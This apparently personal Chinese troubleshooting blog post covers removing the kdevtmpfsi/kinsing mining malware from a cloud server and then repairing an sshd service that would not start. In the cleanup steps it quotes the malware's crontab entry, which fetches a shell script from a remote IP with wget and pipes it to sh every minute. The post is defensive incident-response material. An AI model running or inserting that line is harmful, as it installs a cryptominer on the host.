Linux【问题记录 04】SSH突然无法连接排查2个小时最终解决Failed to start OpenSSH server daemon及阿里云服务器的 kdevtmpfsi 挖矿病毒处理

简介: Linux【问题记录 04】SSH突然无法连接排查2个小时最终解决Failed to start OpenSSH server daemon及阿里云服务器的 kdevtmpfsi 挖矿病毒处理

1.说明

我有两台云服务器,一台阿里的(买了1年),一台腾讯的(买了3年),都是基本配置1核心2G内存(阿里云盘是40G腾讯的是50G),这几天一直收到阿里云的短信说出现了紧急安全事件:恶意脚本代码执行…

今天早上就登录了阿里云服务器查看了一下top,发现 kdevtmpfsi 的进程 cup 占用快100%了,中招的朋友不少,解决方法如下【一共5个步骤】腾讯官方也有相关的 处理方法

# 1.查看kdevtmpfsi的守护进程kinsing先kill掉【否则kdevtmpfsi进程会不断恢复占用】
[root@aliyun ~]# ps -aux | grep kinsing
# 2.查看kdevtmpfsi的进程并kill掉
[root@aliyun ~]# ps -aux | grep kdevtmpfsi 
# 3.删除/tmp/下kdevtmpfsi相关文件
[root@aliyun ~]# cd /tmp/
[root@aliyun tmp]# rm -rf kdevtmpfsi
# 4.删除/var/tmp/下kinsing相关文件
[root@aliyun ~]# cd /var/tmp/
[root@aliyun tmp]# rm -rf kinsing
# 5.查询并删除定时任务 
  # 查询
  [root@aliyun ~]# crontab -l
  * * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
  # 编辑删除 删除全部定时任务 crontab -r
  [root@aliyun ~]# crontab -e

至此,阿里云的服务器问题解决,😢 谁知道,让我哭的是腾讯的云服务器。昨天我还在测试Hadoop,今天使用ssh客户端无法登录,我一想,会不会也是这个病毒…【可惜不是 😳】

2.SSH无法连接问题排查

我先是上控制台进行了实例的自助检测,发现今天上午【连接数出现过达到上限的情况】:

ping了一下服务器,通了…

又确认了一下安全组,没有问题啊…

进行了实例端口验通,也是没有问题…

然后使用腾讯云的控制台登录了服务器:

使用标准登录方式【TCP:22】自然是无法登录的,所以用的是VNC登录:

登录后发现hosts映射和hostname都已经被篡改了,随后查看了 top 没有发现异常,查看 crontab 也没有异常,然后就剩 SSH 服务了:

## 查看服务状态【处理时没有截图】这里复现一下,一直处在【activating(auto-restart)】
[root@VM-0-8-centos ~]# systemctl status sshd.service
● sshd.service - OpenSSH server daemon
   Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)
   Active: activating(auto-restart) (Result: exit-code) since Fri 2021-08-20 13:38:56 CST; 7s ago
     Docs: man:sshd(8)
           man:sshd_config(5)
  Process: 31925 ExecStart=/usr/sbin/sshd -D $OPTIONS (code=exited, status=255)
 Main PID: 31925 (code=exited, status=255)
Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service: main process exited, code=exited, status=255/n/a
Aug 20 13:38:41 VM-0-8-centos systemd[1]: Failed to start OpenSSH server daemon.
Aug 20 13:38:41 VM-0-8-centos systemd[1]: Unit sshd.service entered failed state.
Aug 20 13:38:41 VM-0-8-centos systemd[1]: sshd.service failed.
Aug 20 13:38:56 VM-0-8-centos systemd[1]: Stopped OpenSSH server daemon.
# 查看报错原因
[root@VM-0-8-centos ~]# sshd -t
Missing privilege separation directory: /var/empty/sshd
# 创建文件夹 
[root@VM-0-8-centos ~]# mkdir -p /var/empty/sshd/etc
# 时区设置
[root@VM-0-8-centos ~]# cd /var/empty/sshd/etc/
[root@VM-0-8-centos etc]# ln -s /etc/localtime localtime
# 启动ssh服务
[root@VM-0-8-centos etc]# systemctl start sshd.service
# 再次查看状态
[root@VM-0-8-centos etc]# systemctl status sshd.service
● sshd.service - OpenSSH server daemon
   Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2021-08-20 13:48:24 CST; 4min 7s ago
     Docs: man:sshd(8)
           man:sshd_config(5)
 Main PID: 1015 (sshd)
   CGroup: /system.slice/sshd.service
           ├─1015 /usr/sbin/sshd -D
           ├─1742 sshd: unknown [priv]
           └─1743 sshd: unknown [net]

启动ssh服务成功,问题解决。

3.总结

😡 最终我也不知道为什么突然就无法访问,没有病毒木马,没有恶意连接。收获是:排查问题要从源头排查,刚开始没有想到是SSH服务的问题,一直以为是端口护着TCP无法连接。【给大家一个建议,经常修改服务器登录密码。】 👌

相关实践学习
借助OSS搭建在线教育视频课程分享网站
本教程介绍如何基于云服务器ECS和对象存储OSS,搭建一个在线教育视频课程分享网站。
7天玩转云服务器
云服务器ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,可降低 IT 成本,提升运维效率。本课程手把手带你了解ECS、掌握基本操作、动手实操快照管理、镜像管理等。了解产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
2月前
|
安全 Linux 网络安全
Linux端的ssh如何升级?
Linux端的ssh如何升级?
245 59
|
25天前
|
弹性计算 关系型数据库 网络安全
阿里云国际版无法连接和访问Windows服务器中的FTP服务
阿里云国际版无法连接和访问Windows服务器中的FTP服务
|
3月前
|
Linux 网络安全
Linux开启ssh
Linux开启ssh
38 0
|
3月前
|
缓存 NoSQL 网络安全
【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
|
3月前
|
安全 Linux 网络安全
在Linux中,使用rsync同步数据时,假如采用的是ssh方式,并且目标机器的sshd端端并不是默认的22端口,该如何做?
在Linux中,使用rsync同步数据时,假如采用的是ssh方式,并且目标机器的sshd端端并不是默认的22端口,该如何做?
|
6月前
|
安全 Shell 网络安全
如何通过SSH连接云服务器
当你购买云服务器后,你可以通过SSH方式安全的连接到你的云服务器,因为只有你连上云服务器后才能进行服务器相关的配置操作。这里分别介绍了MAC用户和Windows用户如何通过SSH连接云服务器。
885 1
如何通过SSH连接云服务器
|
网络安全 数据安全/隐私保护
|
5月前
|
安全 Linux Shell
Linux中SSH命令介绍
Linux中SSH命令介绍
122 2
|
3月前
|
安全 Linux 网络安全
在Linux中,如何配置SSH以确保远程连接的安全?
在Linux中,如何配置SSH以确保远程连接的安全?